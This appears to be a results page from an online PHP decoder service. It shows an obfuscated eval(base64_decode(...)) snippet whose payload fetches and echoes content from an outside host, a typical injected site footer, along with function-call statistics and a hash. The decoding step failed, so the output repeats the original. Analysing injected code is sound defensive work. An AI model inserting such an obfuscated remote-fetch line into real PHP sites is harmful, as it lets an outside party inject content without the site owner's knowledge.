Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode('ID8+PD9waHAgZWNobyAkZm9vdCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJodHR..

Decoded Output download

<?php 
    eval(base64_decode('ID8+PD9waHAgZWNobyAkZm9vdCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8va2V5Lm1vbmc2OS5jb20vZm9vdC5waHAiKTs/Pjw/cGhwIA==')); 
     ?>

Did this file decode correctly?

Original Code

<?php
    eval(base64_decode('ID8+PD9waHAgZWNobyAkZm9vdCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8va2V5Lm1vbmc2OS5jb20vZm9vdC5waHAiKTs/Pjw/cGhwIA=='));
     ?>

Function Calls

base64_decode 1
file_get_contents 1

Variables

$foot

Stats

MD5 94e70888022299c4bfdc890840f04468
Eval Count 1
Decode Time 39 ms